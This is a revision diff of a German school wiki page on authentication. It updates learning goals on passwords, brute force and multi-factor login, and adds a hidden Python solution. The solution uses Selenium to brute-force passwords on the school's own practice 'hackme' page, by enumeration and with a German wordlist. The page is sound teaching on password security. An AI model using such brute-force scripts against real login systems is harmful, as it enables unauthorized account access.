Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen der Seite angezeigt.

--- gf_informatik:web_sca:authentifizierung [2024-03-03 22:01] – [Aufgabe 1 – Wo und wann werden mehrere Faktoren geprüft?] sca
+++ gf_informatik:web_sca:authentifizierung [2024-03-11 10:22] (aktuell) – [Authentifizierung] sca
@@ Zeile 1: / Zeile 1: @@
 ====== Authentifizierung ======
-<nodisp 2>
-++++Plan|
-   * Lektion 1: Märchenstunde, zusammen besprechen/kleine Gruppenarbeiten, bis und mit Passwortmanager
-   * Lektion 2: Brute Force
-   * Lektion 3: Brute Force II, Laufzeitanalyse
-   * Lektion 4: Mehrfaktorauth.
-   * Lektion 5: eigene Sicherheit verbessern
-++++
-</nodisp>
 ++++Lernziele|
@@ Zeile 25: / Zeile 13: @@
    * Welche Massnahmen kann man im Bezug auf Passwörter treffen, um möglichst sicher zu sein?
    * Wie kann man herausfinden, ob man bereits Opfer von Hackern wurde?
-   * Was ist eine **Brute-Force**-Attacke?
+   * Erklären, was Idee hinter **Brute-Force**-Attacke ist und verschiedene Versionen davon kennen.
-   * Programmiere eine solche mit Python.
    * Was sind die Stärken und Schwächen einer solchen Attacke?
    * Was ist eine **Drei-Faktor-Authentifizierung**?
@@ Zeile 34: / Zeile 21: @@
    * Was kann man selbst unternehmen, um möglichst sicher im Web unterwegs zu sein?
    * Analysiere eine Situation (Bsp. Geschichte mit sieben Geisslein) und gebe Tipps, wie man die Sicherheit erhöhen könnte.
+   * **Programmieren:**
+     * Brute-Force Attacke und ähnliche Codes **Programmieren** können.
+     * Wissen, wie File eingelesen wird.
 ++++
@@ Zeile 271: / Zeile 262: @@
+=== Aufgabe 1 – Prüfe und verbessere deine IT-Sicherheit ===
-=== Aufgabe 2 – Prüfe und verbessere deine IT-Sicherheit ===
 . **Analyse:**
@@ Zeile 290: / Zeile 280: @@
 <nodisp 1>
-Brute-Force:
+++++Brute-Force|
 <code python>
+### requires: `pip install selenium`
+### DON'T CHANGE CODE FROM HERE ...
+from selenium import webdriver
+from selenium.webdriver.common.by import By
+# url to website
+url_website = "https://if.ksr.ch/sca/hackme/"
+# Open the webpage
+driver = webdriver.Chrome()
+driver.get(url_website)
+# Enter text and click button -> not relevant for our hack
+input_field = driver.find_element(By.ID,"textInput") # find the input box ...
+input_field.send_keys("guess pw here") # ... and insert text
+button = driver.find_element(By.ID,"btnSend") # find the button ...
+button.click() # ... and click it
+### ... UNTIL HERE
+### WRITE YOUR CODE BETWEEN HERE ...
-</code>
+alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-<code python>
+## PASSWORD 1
+print("PASSWORD 1")
+for pw in alphabet:
+    code,message = driver.execute_script(f'return check_pw("{pw}")') # try password on website, returns code and message
+    if code == 201:
+        print(pw)
+        print(message)
+## PASSWORD 2
+print("PASSWORD 2")
+for x in alphabet:
+    for y in alphabet:
+        for z in alphabet:
+            pw = x + y + z
+            code,message = driver.execute_script(f'return check_pw("{pw}")') # try password on website, returns code and message
+            if code == 201:
+                print(pw)
+                print(message)
+## PASSWORD 3
+print("PASSWORD 3")
+with open("woerter_top10000de_upper.txt",'r') as file:
+    for line in file:
+        pw = line.strip() # strip entfernt Leerschläge und Zeilenumbrüche am Anfang und Ende
+        code,message = driver.execute_script(f'return check_pw("{pw}")') # try password on website, returns code and message
+        if code == 201:
+            print(pw)
+            print(message)
+### ... AND HERE. DON'T CHANGE LAST LINE:
+driver.quit() # Close the browser
 </code>
+++++